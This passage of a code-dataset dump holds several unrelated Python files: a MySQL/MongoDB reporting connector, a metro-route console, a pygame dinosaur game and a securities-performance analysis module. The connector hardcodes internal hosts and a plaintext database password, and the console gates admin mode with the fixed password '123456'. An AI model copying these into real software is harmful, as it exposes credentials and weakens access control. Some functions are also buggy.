CrossValStatsMonParser()\n","sub_path":"TuningTools_old/python/parsers/CrossValidStatMon.py","file_name":"CrossValidStatMon.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"54522349","text":"#!/usr/bin/python\nimport pymysql\nimport pika\nimport datetime\nimport pymongo\nfrom pymongo import MongoClient\n\n\nimport pymysql\nfrom pymongo import MongoClient\nfrom Common import Commmon\n\n\nimport csv\n\nclient = MongoClient('localhost', 27017)\nmongodb = client.HTMLDumps\n#reportPath = 
'http://ecxusubt07.eclerx.com:5000/fetchreport/'\n\nreportPath = \"http://127.0.0.1:5000/fetchreport/\"\n\n\n# db = pymysql.connect(host=\"192.168.8.67\",\n# user=\"tech\",\n# passwd=\"eclerx#123\",\n# db=\"eCube_Centralized_DB\")\n\n\n# db = pymysql.connect(host=\"localhost\",\n# user=\"tech\",\n# passwd=\"eclerx#123\",\n# db=\"eCube_Centralized_DB\")\n\ndb = pymysql.connect(host=\"192.168.8.37\",\n user=\"tech\",\n passwd=\"eclerx#123\",\n db=\"eCube_Centralized_DB\")\n\n# db = pymysql.connect(host=\"192.168.131.23\",\n# user=\"tech\",\n# passwd=\"Eclerx#123\",\n# db=\"eCube_Centralized_DB\")\n\n\nclass DBconnection:\n\n ##### Report QUEUE\n\n def GetInQueRequest(self):\n\n cur = db.cursor()\n print(\"OK Connected\")\n try:\n cur.callproc('sp_GetInQueRequest', args=(\"\"))\n db.commit()\n except Exception as e:\n print(\"Stored Procedure not properly execued\")\n\n db.close()\n return cur\n\n def GetCrawlResponse(self,id):\n resultData = []\n\n\n result = mongodb.CrawlResponse.find({'RequestRunId': int(id)})\n print(\"Report Get Crawl Function Called\",result)\n\n for item in result:\n\n finaldict = Commmon.entries_to_remove(item)\n resultData.append(finaldict)\n return resultData\n\n\n def UpdateReportStatus(self,requestRunId, status):\n cur = db.cursor()\n print(\"Report Update Status Function called\")\n try:\n cur.callproc('sp_UpdateReportStatus', args=(requestRunId,status))\n db.commit()\n except Exception as e:\n print(\"Stored Procedure not properly executed - sp_UpdateReportStatus\",str(e))\n\n #db.close()\n return cur\n\n def SaveReportLink(self, requestRunId, reportName):\n reportLink = reportPath+ reportName\n print(\"****************\",reportLink)\n print(reportName)\n print(requestRunId)\n cur = db.cursor()\n print(\"Save Report Link function called\")\n try:\n cur.callproc('sp_UpdateReportLink', args=(requestRunId, reportLink))\n db.commit()\n except Exception as e:\n print(\"Stored Procedure not properly executed --- sp_UpdateReportLink\",str(e))\n\n #db.close()\n return cur\n\n\n\n\n","sub_path":"eCube_Hotel_2/HotelMessaging/Ecube2.0MessagingReportingService/ReportingService/Queues/ReportQueue/DBConnection.py","file_name":"DBConnection.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"369888343","text":"from Metro import Metro\nfrom MetaController import MetaController\nfrom ProjectTools import getProjectPath\nfrom Console import Console\nimport os\n\n\nclass MetroConsole(Console):\n\n password = \"123456\"\n\n def __init__(self) -> None:\n\n super(MetroConsole, self).__init__()\n\n self._filePath = None\n self._meta = MetaController()\n self._metro = None\n\n def define(self) -> None:\n self.newPage(self.pageMain, \"Main\")\n self.newPage(self.pageAdmin, \"Admin\")\n self.newPage(self.pageUser, \"User\")\n self.setJump(\"Main\")\n\n def printMeta(self) -> None:\n self.newBox()\n self.addContentToBox(self._meta.getNameEN())\n self.addContentToBox(\"developer: \" + self._meta.getDeveloper())\n self.addContentToBox(\"code version: \" + self._meta.getCodeVersion())\n self.addContentToBox(\"data version: \" + self._meta.getDataVersion())\n self.drawBox()\n\n def printAdminHint(self) -> None:\n self.newBox()\n self.addContentToBox(\"logout: lot out and return to the main interface\", 5)\n self.addContentToBox(\"list : list the infomation of the designated station or line\", 5)\n self.addContentToBox(\"new : build a new station or line\", 5)\n self.addContentToBox(\"add : add a 
station to a line:\", 5)\n self.addContentToBox(\"save : save the latest data to a file\", 5)\n self.addContentToBox(\"load : load an existing data file\", 5)\n self.addContentToBox(\"create: create a new data file\", 5)\n self.addContentToBox(\"query : query the line between any station\", 5)\n self.addContentToBox(\"close : close the open file\", 5)\n self.drawBox()\n\n def printUserHint(self) -> None:\n self.newBox()\n self.addContentToBox(\"logout: lot out and return to the main interface\", 5)\n self.addContentToBox(\"list : list the infomation of the designated station or line\", 5)\n self.addContentToBox(\"load : load an existing data file\", 5)\n self.addContentToBox(\"query : query the line between any station\", 5)\n self.drawBox()\n\n def pageMain(self, pageIndex: int) -> None:\n\n vaildOper = {\"user\": self.operTurnToUser, \"admin\": self.operTurnToAdmin,\n \"exit\": self.operExit}\n\n while pageIndex == self._select:\n os.system(\"cls\")\n self.printMeta()\n print(\"\\n Please select the operation Mode(user/admin):\", end=\"\")\n oper, argList = self.inputOper()\n self.dispatcher(oper, argList, vaildOper)\n\n def pageUser(self, pageIndex: int) -> None:\n\n vaildOper = {\"logout\": self.operLogout, \"list\": self.operList,\n \"load\": self.operLoad, \"query\": self.operQuery}\n\n os.system(\"cls\")\n self.printUserHint()\n print(\"\\n Enter you operation:\", end=\"\")\n while pageIndex == self._select:\n oper, argList = self.inputOper()\n os.system(\"cls\")\n self.printUserHint()\n self.dispatcher(oper, argList, vaildOper)\n print(\"\\n Enter you operation:\", end=\"\")\n\n def pageAdmin(self, pageIndex: int) -> None:\n\n vaildOper = {\"logout\": self.operLogout, \"list\": self.operList,\n \"new\": self.operNew, \"add\": self.operAdd,\n \"save\": self.operSave, \"load\": self.operLoad,\n \"create\": self.operCreate, \"query\": self.operQuery,\n \"close\": self.operClose}\n\n os.system(\"cls\")\n self.printAdminHint()\n print(\"\\n Enter you operation:\", end=\"\")\n while pageIndex == self._select:\n oper, argList = self.inputOper()\n os.system(\"cls\")\n self.printAdminHint()\n self.dispatcher(oper, argList, vaildOper)\n print(\"\\n Enter you operation:\", end=\"\")\n\n def operTurnToUser(self, argList: list):\n self.setJump(\"User\")\n\n def operTurnToAdmin(self, argList: list):\n print(\" Please enter your password:\", end=\"\")\n if input() == MetroConsole.password:\n self.setJump(\"Admin\")\n\n def operLogout(self, argList: list):\n self.setJump(\"Main\")\n\n def operList(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n stationNames = self._metro.getStationsName()\n lineNames = self._metro.getLinesName()\n stationOrder = self._metro.getStationOrder()\n\n self.newBox()\n for i in range(len(lineNames)):\n self.addContentToBox(\"line: {}\".format(lineNames[i]), 5)\n for j in stationOrder[i]:\n self.addContentToBox(\"{}-->\".format(stationNames[j]), 10)\n self.drawBox()\n\n def operLoad(self, argList: list):\n\n if self._metro is not None:\n print(\" You have already opened a file.\")\n return None\n\n if len(argList) < 1:\n print(\" Wrong number of parameters.\")\n print(\" Usage: load -\")\n return None\n\n self._filePath = getProjectPath() + \"/citys/{}.txt\".format(argList[0])\n if not os.path.exists(self._filePath):\n print(\" File doesn't exist.\")\n self._filePath = None\n return None\n\n print(\" Load data from file: {}...\".format(self._filePath), end=\"\")\n self._metro = Metro(self._filePath)\n 
print(\" done!\")\n\n def operQuery(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n if len(argList) < 2:\n print(\" Wrong number of parameters.\")\n print(\" Usage: query - -\")\n return None\n\n stationNames = self._metro.getStationsName()\n path, weight = self._metro.findPath(argList[0], argList[1])\n\n self.newBox()\n self.addContentToBox(\"You need to take {} stops in the subway\".format(weight), 5)\n for s in path:\n self.addContentToBox(\"{}-->\".format(stationNames[s]), 10)\n self.drawBox()\n\n def operNew(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n if len(argList) < 2:\n print(\" Wrong number of parameters.\")\n print(\" Usage: new - -\")\n return None\n\n if argList[0] not in ['s', 'l']:\n print(\" The first parameter must be 's' or 'l'.\")\n return None\n\n if argList[0] == 's':\n try:\n self._metro.newStation(argList[1])\n except Exception:\n print(\" The station has already exist.\")\n return None\n\n if argList[0] == 'l':\n try:\n self._metro.newLine(argList[1])\n except Exception:\n print(\" The line has already exist.\")\n return None\n\n def operAdd(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n if len(argList) < 2:\n print(\" Wrong number of parameters.\")\n print(\" Usage: add - - -\")\n return None\n\n try:\n if len(argList) == 2:\n self._metro.addStationToLine(argList[0], argList[1])\n if len(argList) == 3:\n self._metro.addStationToLine(argList[0], argList[1], argList[2])\n except Exception:\n print(\" Error in information.\")\n return None\n\n def operSave(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n self._metro.writeToFile(self._filePath)\n\n def operClose(self, argList: list):\n\n if self._metro is None:\n print(\" You haven't opened a file yet.\")\n return None\n\n print(\" Do you want to save the file? 
(y/n)\", end=\"\")\n oper = input()\n\n if oper not in ['y', 'n']:\n print(\" Colse fail.\")\n return None\n\n if oper == 'y':\n self.operSave(None)\n\n self._metro = None\n self._filePath = None\n\n def operCreate(self, argList: list):\n\n if self._metro is not None:\n print(\" You have already opened a file.\")\n return None\n\n if len(argList) < 1:\n print(\" Wrong number of parameters.\")\n print(\" Usage: add -\")\n return None\n\n _path = getProjectPath() + \"/citys/{}.txt\".format(argList[0])\n if os.path.exists(_path):\n print(\" File already exist.\")\n return None\n\n open(_path, 'w').close()\n Metro.initMetroFile(_path)\n print(\"creat file success!\")\n\n\nif __name__ == \"__main__\":\n MetroConsole().startUp()\n","sub_path":"source/metroconsole.py","file_name":"metroconsole.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"256231788","text":"import pygame\n\nfrom nlc_dino_runner.components.lives.lives import Live\nfrom nlc_dino_runner.components.lives.livesManager import LiveManager\nfrom nlc_dino_runner.components.powerups.power_up_manager import PowerUpManager\nfrom nlc_dino_runner.utils import text_utils\nfrom nlc_dino_runner.components.obstacles.obtaclesManager import ObstaclesManager\nfrom nlc_dino_runner.components.dinosaur import Dinosaur\nfrom nlc_dino_runner.utils.constants import TITLE, ICON, SCREEN_HEIGHT, SCREEN_WIDTH, BG, FPS, CLOUD, GAME_OVER_IMG, DARK_MODE, NORMAL_MODE\n\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(TITLE)\n pygame.display.set_icon(ICON)\n self.clock = pygame.time.Clock()\n self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n self.playing = False\n self.game_speed = 20\n self.x_pos_bg = 0\n self.y_pos_bg = 360\n self.player = Dinosaur()\n self.obstacles_manager = ObstaclesManager()\n self.power_up_manager = PowerUpManager()\n self.points = 0\n self.running = True\n self.death_count = 0\n self.highest_score = 0\n self.live = Live()\n self.live_manager = LiveManager()\n self.nigth = False\n\n def run(self):\n self.obstacles_manager.reset_obstacles()\n self.power_up_manager.reset_power_ups()\n self.live_manager.reset_lives()\n self.game_speed = 20\n self.player = Dinosaur()\n self.points = 0\n self.playing = True\n while self.playing:\n self.event()\n self.update()\n self.draw()\n\n def event(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.playing = False\n\n def update(self):\n user_input = pygame.key.get_pressed()\n self.player.update(user_input, self.game_speed)\n self.obstacles_manager.update(self)\n self.power_up_manager.update(self.points, self.game_speed, self.player)\n\n def draw(self):\n self.clock.tick(FPS)\n if (self.points // 1000) % 2 == 1:\n self.screen.fill(DARK_MODE)\n self.nigth = True\n else:\n self.screen.fill(NORMAL_MODE)\n self.nigth = False\n #self.screen.fill((255,255,255))\n self.score()\n self.draw_background()\n self.draw_sky()\n self.player.draw(self.screen)\n self.obstacles_manager.draw(self.screen)\n self.power_up_manager.draw(self.screen)\n self.live_manager.draw(self.screen)\n pygame.display.update()\n pygame.display.flip()\n\n def score(self):\n self.points += 1\n if self.points % 100 == 0:\n self.game_speed += 1\n if self.nigth:\n score_element, score_element_rect = text_utils.get_score_element(self.points, (255, 255, 255))\n else:\n score_element, score_element_rect = text_utils.get_score_element(self.points)\n 
self.screen.blit(score_element, score_element_rect)\n self.player.check_invincibility(self.screen, self.nigth)\n #self.player.check_hammer(self.screen)\n\n def draw_background(self):\n image_width = BG.get_width()\n self.screen.blit(BG, (self.x_pos_bg, self.y_pos_bg))\n self.screen.blit(BG, (self.x_pos_bg + image_width, self.y_pos_bg))\n if self.x_pos_bg <= -image_width:\n self.screen.blit(BG, (self.x_pos_bg + image_width, self.y_pos_bg))\n self.x_pos_bg = 0\n self.x_pos_bg -= self.game_speed\n\n def draw_sky(self):\n image_width = CLOUD.get_width()\n self.screen.blit(CLOUD, (self.x_pos_bg + 1100, self.y_pos_bg - 200))\n #self.screen.blit(CLOUD, (self.x_pos_bg, self.y_pos_bg))\n if self.x_pos_bg > +image_width:\n #self.screen.blit(CLOUD, (self.x_pos_bg + 1100, self.y_pos_bg))\n self.x_pos_bg = 0\n #self.x_pos_bg += self.game_speed - 15\n\n def execute(self):\n while self.running:\n if not self.playing:\n self.show_menu()\n #GAME_THEME.stop()\n\n def show_menu(self):\n self.running = True\n white_color = (255, 255, 255)\n self.screen.fill(white_color)\n self.print_menu_elements()\n pygame.display.update()\n self.handle_key_events_on_menu()\n\n def handle_key_events_on_menu(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n self.playing = False\n pygame.display.quit()\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n self.run()\n\n def print_menu_elements(self):\n half_screen_height = SCREEN_HEIGHT / 2\n if self.death_count == 0:\n message = \"Press any Key to Start\"\n else:\n message = \"Press any Key to Restart\"\n text, text_rect = text_utils.get_centered_message(message)\n self.screen.blit(text, text_rect)\n\n death_score, death_score_rect = text_utils.get_centered_message(\"Death count: \" + str(self.death_count), height=half_screen_height + 50)\n self.screen.blit(death_score, death_score_rect)\n\n highest, highest_rect = text_utils.get_centered_message(\"Highest score: \" + str(self.highest_score), height=560 , width= 180)\n self.screen.blit(highest, highest_rect)\n\n #Imprimiendo dinosaurio de portada\n self.screen.blit(ICON, ((SCREEN_WIDTH / 2) - 40, (SCREEN_HEIGHT / 3.6)))\n","sub_path":"nlc_dino_runner/components/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"315651398","text":"\"\"\"\nAuthor: Philip.P\nDate created: 16/03/19\n\nAnalyse financial security (mainly price) data (sourced from Bloomberg or YahooFinance (via API)).\nCan specify ticker:fund name json mapping in config\n\nTODO:\n - Refactor the init in Analysis class to load in the data, fewer setting of start and end dates\n - Charts for lookback performance, limiting the number if more than 5 funds\n - Plotting capabilities for stock charts\n\"\"\"\n\nimport datetime as dt\nimport json\nimport os\nfrom typing import Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import ticker as mtick\n\nimport utils_date\nfrom securityAnalysis.utils_finance import calc_info_ratio, calc_sharpe_ratio, calc_sortino_ratio, \\\n calculate_annual_return, calculate_annual_volatility\nfrom utils_generic import prep_fund_data\n\nplt.style.use('ggplot')\nplt.tight_layout()\nplt.close()\npd.set_option('display.max_columns', 5)\n\nextract_str_timestamp = lambda d: dt.datetime.strftime(d, \"%Y%m%d\")\n\n\nclass Analysis:\n \"\"\"Analysis of historical security data, providing analytics on performance- will 
remove nan\n\n Args:\n data: Security price data over time period (assumed daily)\n is_bloomberg: Financial data source, acceptable sources Bloomberg (bbg) or YahooFinance via the API (yfin)\n input_directory: Working directory\n\n\n Attributes:\n run_date: YYYMMDD\n input_directory: Working directory\n output_dir: Output directory\n data: Data to be analysed\n \"\"\"\n\n def __init__(self, data: pd.DataFrame, input_directory: str, is_bloomberg: str) -> None:\n self.run_date = extract_str_timestamp(dt.datetime.now())\n self.wkdir = input_directory\n self.set_output_folder()\n\n if is_bloomberg:\n input_data = utils_date.char_to_date(data)\n\n self.start_date = extract_str_timestamp(input_data.index.min())\n self.end_date = extract_str_timestamp(input_data.index.max())\n print(f\"Data for period runs {self.start_date} to {self.end_date}\")\n\n self.data = input_data\n elif is_bloomberg:\n print(\"Data likely downloaded from Yahoo Finance?\")\n pass\n\n def clean_slice_data(self, input_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Clean/slice (or both) data by removing NAs from the analysis\n\n Args:\n input_data: Security data in wide, short format\n drop_na\n\n Returns:\n pd.DataFrame\n \"\"\"\n # check for NaN values and drop, alerting user for what has been dropped\n na_secs_names = input_data.columns[input_data.isnull().any()].values\n if len(na_secs_names) > 0:\n print(\"The following securities have NaNs in the dataset and will\"\n \"be included in the analysis: \\n {}\".format(na_secs_names))\n\n clean_data = input_data.dropna(axis=0, inplace=True)\n\n print(f\"Data analysed for period {self.start_date} to {self.end_date}\")\n\n return clean_data\n\n def set_output_folder(self):\n \"\"\"Set output folder according to working directory specified\"\"\"\n output_path = os.path.join(self.wkdir, \"output\", self.run_date)\n self.output_dir = output_path\n if not os.path.exists(self.output_dir):\n os.mkdir(self.output_dir)\n print(f\"Output folder created: {self.output_dir}\")\n\n def annual_return_table(self, data: pd.DataFrame, save_results: bool = True) -> pd.DataFrame:\n \"\"\"Basic summary table of annual returns of stocks\n\n Args:\n data\n save_results: Saves in the self.output_dir\n\n Returns:\n pd.DataFrame\n \"\"\"\n\n input_data = data.copy(True)\n total_annual_rtn = (input_data.groupby(input_data.index.year).last() / input_data.groupby(\n input_data.index.year).first())\n\n annual_rtn = (total_annual_rtn - 1).T\n annual_rtn.index.name = \"Security / Annual Return\"\n\n if save_results:\n annual_rtn.to_csv(f\"{self.output_dir}/{self.run_date}_sec_annual_return.csv\")\n print(f\"Annual returns table saved as csv in {self.output_dir}\")\n return annual_rtn\n\n def performance_summary(self, data: pd.DataFrame, risk_free_rate: float = 0,\n target_return_rate: float = 0,\n to_calculate_risk_measures: bool = True,\n save_results: bool = False) -> pd.DataFrame:\n \"\"\"\n Summarises return and volatility for input data over whole period\n\n Args:\n data: Data to analyse performance of\n risk_free_rate: Annual risk free rate\n target_return_rate: Target rate of (daily) period return\n to_calculate_risk_measures: Include Sharpe and Sortino Ratios in the summary table\n save_results: If True by default will save in self.output_dir\n\n Returns:\n summary: table of returns and volatility of securities entered\n \"\"\"\n\n data_to_clean = data.copy(True)\n\n annual_rtn = calculate_annual_return(data=data_to_clean)\n annual_vol = calculate_annual_volatility(data=data_to_clean)\n info_ratio 
= calc_info_ratio(data=data_to_clean)\n\n cols = ['Annual Return', 'Annual Volatility', 'Info Ratio']\n summary = pd.concat([annual_rtn, annual_vol, info_ratio], axis=1)\n summary.columns = cols\n\n if to_calculate_risk_measures:\n if risk_free_rate is None:\n risk_free_rate = 0\n\n sharpe = calc_sharpe_ratio(data=data,\n risk_free=risk_free_rate)\n sortino = calc_sortino_ratio(data=data,\n target_return=target_return_rate,\n risk_free=risk_free_rate)\n\n cols += ['Sharpe Ratio', 'Sortino Ratio']\n summary = pd.concat([summary, sharpe, sortino], axis=1)\n summary.columns = cols\n\n summary.dropna(inplace=True)\n summary.index.name = \"Fund/Stock\"\n\n log = \" \".join([\"Fund Stats for\", self.start_date, \"to\", self.end_date])\n errors = data_to_clean.columns.difference(summary.index).values.tolist()\n\n print(log)\n if len(errors) > 0:\n print(f\"There were errors in the dataset for the following funds: \\n {errors}\")\n\n if save_results:\n file_name = \"_\".join([\"securities_summary\", self.start_date, self.end_date, \".csv\"])\n summary.to_csv(os.path.join(f\"{self.output_dir}/{file_name}\"))\n print(f\"Summary table has been written to csv file in directory: {self.output_dir}\")\n\n return summary\n\n # TODO: rewrite as this isn't good in terms of the timedelta\n # def calculate_lookback_performance(\n # self, end_date: np.datetime64 = None,\n # lookback_periods: List[str] = [\"0D\", \"6M\", \"1Y\", \"2Y\", \"3Y\"],\n # to_save_results=False) -> pd.DataFrame:\n # \"\"\"Analyse performance of certain funds over a custom lookback period (list)\n #\n # Args:\n # end_date: If not specified, defaults to last valid date in dataset\n # lookback_periods\n # \"\"\"\n # df = self.data\n #\n # if end_date is None:\n # end_date = self.end_date\n #\n # if lookback_periods is None:\n # lookback_periods = [\"0D\", \"3M\", \"6M\", \"9M\", \"12M\", \"18M\", \"24M\"]\n #\n # # TODO: if a date in the lookback is not in the range of the dataset then we drop this date\n # target_dates = [utils_date.return_date_diff(df, end_date, i) for i in lookback_periods]\n # target_prices = [df.loc[i, :].values for i in target_dates]\n #\n # # iloc[::-1] is to reverse the dataframe by the date index --> earliest to latest\n # lookbackTable = pd.DataFrame.from_records(target_prices, index=target_dates, columns=df.columns)\n # lookbackTable.sort_index(ascending=True, inplace=True)\n #\n # # Period return\n # cumulativeReturn = lookbackTable.apply(lambda x: x / x[0])\n # cumulativeReturn['Return Period'] = lookback_periods\n # cumulativeReturn = cumulativeReturn[cumulativeReturn.columns.tolist()[-1:] +\n # cumulativeReturn.columns.tolist()[:-1]]\n #\n # if to_save_results:\n # fileName = utils_date.date_to_str(self.start_date) + \"_\" + utils_date.date_to_str(self.end_date) + \"_\"\n # writer = pd.ExcelWriter(self.output_dir + fileName + \"Security Performance.xlsx\")\n #\n # lookbackTable.index = lookbackTable.index.values.astype(\"datetime64[D]\")\n # lookbackTable_print = lookbackTable.T\n # lookbackTable_print.to_excel(writer, \"Prices\")\n #\n # cumulativeReturn.index = cumulativeReturn.index.values.astype(\"datetime64[D]\")\n # cumulativeReturn.T.to_excel(writer, \"Return\")\n #\n # writer.save()\n # print(\"Lookback performance table has been written to directory: {dry}\".format(dry=self.output_dir))\n #\n # # Plotting the results\n # # if returnPlot:\n # # data_to_plot = cumulativeReturn.drop(['Return Period'], axis =1)\n # # # plt.figure()\n # # if data_to_plot.shape[1] > 5:\n # # nSubplots = 
round(data_to_plot.shape[1]/5)\n # # for i in range(nSubplots):\n # # plt.figure()\n # # subset_data = data_to_plot.iloc[:,(5*i):(5*i)+5]\n # # plt.suptitle(\"Normalised Return Securities\" + str(i))\n # # plt.plot(subset_data)\n # # plt.xlabel('Time Period')\n # #\n # #\n # # ax = cumulativeReturn.drop(['Return Period'], axis =1).plot()\n # #\n # # vals = ax.get_yticks()\n # # ax.set_yticklabels(([format(x, ',') for x in vals]))\n # # plt.ylabel(\"Normalised Return\")\n # # plt.grid()\n # # plt.tight_layout()\n # # plt.title(\"Normalised Return for funds\")\n # # plt.legend(loc=\"upper left\", fontsize='xx-small', ncol=2)\n # # plt.savefig(self.output_dir + \"/CumulativeReturn Plot.png\")\n # # plt.close()\n\n @staticmethod\n def return_bollinger_band(data: pd.DataFrame, window: int, std_devs: int\n ) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Function to return bollinger bands for securities\n\n Args:\n data: Dataframe of stock prices with index as np.datetime64\n window: Rolling window (in days) for mean price and standard deviation\n std_devs: Number of standard deviations for bollinger band, usually an integer\n\n Returns:\n pd.DataFrame: roll_mean\n pd.DataFrame: roll_std\n pd.DataFrame: boll_high\n pd.DataFrame: boll_low\n \"\"\"\n\n roll_mean = data.rolling(window).mean()\n roll_std = data.rolling(window).std()\n\n boll_high = roll_mean + (roll_std * std_devs)\n boll_low = roll_mean - (roll_std * std_devs)\n\n return roll_mean, roll_std, boll_high, boll_low\n\n def plot_bollinger_bands(self, data: pd.DataFrame, rolling_window: int = 20,\n num_st_devs: int = 2) -> None:\n \"\"\"Function to do bollinger band plots for each of the stocks in the dataframe\"\"\"\n\n for col in data.columns:\n slice = data.loc[:, col]\n normed_px = slice / slice[0]\n\n # Info for bollinger plots, also useful elsewhere\n roll_mn, roll_std, boll_high, boll_low = \\\n Analysis.return_bollinger_band(data=slice,\n window=rolling_window,\n std_devs=num_st_devs)\n\n # Plot the charts\n fig, ax1 = plt.subplots()\n color = 'tab:red'\n ax1.set_xlabel(\"Time\")\n ax1.set_ylabel(\"Price\")\n ax1.plot(roll_mn, color=color)\n # ax1.tick_params(axis='y', labelcolor=color)\n ax1.plot(boll_high, linestyle=\"dashed\", color=\"k\", linewidth=0.5)\n ax1.plot(boll_low, linestyle=\"dashed\", color=\"k\", linewidth=0.5)\n ax1.yaxis.set_major_locator(\n mtick.LinearLocator(6)) # set there to be N=6 lines on y-axis\n\n norm_std_rolling = normed_px.rolling(window=rolling_window).std()\n ax2 = ax1.twinx()\n color = 'tab:blue'\n ax2.set_ylabel('Rolling Volatility')\n ax2.plot(norm_std_rolling, color=color)\n # ax2.tick_params(axis='y', labelcolor=color)\n ax2.set_ylim(0, 0.25)\n ax2.yaxis.set_major_locator(mtick.LinearLocator(6))\n\n plt.suptitle(col + \" (rolling {n}-day window)\".format(n=rolling_window))\n # fig.tight_layout()\n plt.show()\n plt.savefig(f\"{self.output_dir}/{col} Price & Vol History.png\")\n plt.close()\n\n @staticmethod\n def plot_total_return(input_data: pd.DataFrame, output_dir: str, log_returns=False) -> None:\n \"\"\"Plot the normalised return over time, anchored back to start of lookback period\"\"\"\n\n for col in input_data.columns:\n slice = input_data.loc[:, col]\n\n if log_returns:\n normed_px = 1 + np.log(slice / slice[0])\n else:\n normed_px = slice / slice[0]\n\n # Plot the charts\n fig, ax1 = plt.subplots()\n color = 'tab:red'\n ax1.set_xlabel(\"Time\")\n ax1.plot(normed_px, color=color)\n\n if log_returns:\n ax1.set_ylabel(\"Log Total Return\")\n plt.suptitle(col 
+ \" - Log Total Return\")\n else:\n ax1.set_ylabel(\"Total Return\")\n plt.suptitle(col + \" - Total Return\")\n\n plt.show()\n if log_returns:\n plt.savefig(f\"{output_dir}/{col} - Log Total Return Chart.png\")\n else:\n plt.savefig(f\"{output_dir}/{col} - Total Return Chart.png\")\n plt.close()\n\n # def csv_summary(self, output_dir: str) -> None:\n # \"\"\"Print the summary to csv file\"\"\"\n #\n # if output_dir is None:\n # output_dir = self.output_dir\n #\n # writer = pd.ExcelWriter(os.path.join(output_dir, \"Stock Summary Measures.xlsx\"))\n # summary_one = self.summaryTable(toCsv=False, r=0.01) # Summary table- return/volatility/info & sharpe ratio\n #\n # summary_one[['Annualised Return', 'Annual Volatility']] *= 100\n # summary_one[['Annualised Return', 'Annual Volatility']] = \\\n # summary_one[['Annualised Return', 'Annual Volatility']].applymap(\"{0:.2f}%\".format)\n # summary_one[['Information Ratio', 'Sharpe Ratio']] = summary_one[\n # ['Information Ratio', 'Sharpe Ratio']].applymap(\"{0:.4}\".format)\n #\n # summary_one.to_excel(writer, \"Summary Table\")\n #\n # annual_table = self.annualReturns(toCsv=False)\n # annual_table.columns = annual_table.columns.astype(str)\n #\n # print_annual_table = annual_table * 100\n # print_annual_table = print_annual_table.applymap(\"{0:.2f}%\".format)\n # print_annual_table.to_excel(writer, \"Annual Return\")\n #\n # correlation_mat = self.data.corr() # correlation matrix\n # correlation_mat.to_excel(writer, \"Correlation\")\n #\n # writer.save()\n # print(\"Summary statistics produced, and in the following directory: \" + self.output_dir)\n\n\nif __name__ == \"main\":\n from securityAnalysis.securities_analysis import Analysis\n from get_paths import get_config_path\n\n WK_DIR = \"/Users/philip_p/Documents/python/\"\n INPUT_FOLDER = os.path.join(WK_DIR, \"data/finance\")\n OUTPUT_FOLDER = os.path.join(WK_DIR, \"output\")\n df = prep_fund_data(df_path=F\"{INPUT_FOLDER}/funds_stocks_2019.csv\")\n\n with open(get_config_path(\"bbg_ticker.json\")) as f:\n TICKER_MAP_DICT = json.load(f)\n\n rn = Analysis(data=df, input_directory=WK_DIR, is_bloomberg=True)\n clean_df = rn.clean_slice_data(input_data=df)\n results = rn.performance_summary(data=clean_df, save_results=True)\n # rn.plot_bollinger_bands(data=df, window=60)\n\n rn = Analysis(data=df, input_directory=INPUT_FOLDER, is_bloomberg=True)\n # rn.plot_bollinger_bands(data = df[df.index > \"2014-01-01\"])\n\n # # cut the dataframe and only look at the nulls\n # df = df.loc[:, df.isnull().sum() != 0]\n # null_lst = list(df.isnull().sum().values) # list of first null values\n #\n # for i, e in enumerate(null_lst):\n # slice = df.iloc[e:, i]\n # slice.dropna(axis=0, inplace=True)\n # start_date = slice.index[0].strftime(\"%Y-%m-%d\")\n # name = pd.Series(slice).name\n #\n # try:\n # rn = Analysis(data=slice, start_date=start_date, end_date=\"2019-07-05\")\n # except (AttributeError) or (IndexError):\n # rn = Analysis(data=pd.DataFrame(slice), start_date=start_date, end_date=\"2019-07-05\")\n #\n # # rn = Analysis(data=slice, start_date=start_date, end_date=\"2019-07-05\")\n # rn.excel_summary()\n # os.rename(os.path.join(outputDir, \"Stock Summary Measures.xlsx\"),\n # os.path.join(outputDir, \"Stock Summary Measures_\" + name + \".xlsx\"))\n # rn.plot_total_return(data=rn.data, output_dir=outputDir, isLog=True)\n # rn.plot_total_return(data=rn.data, output_dir=outputDir, 
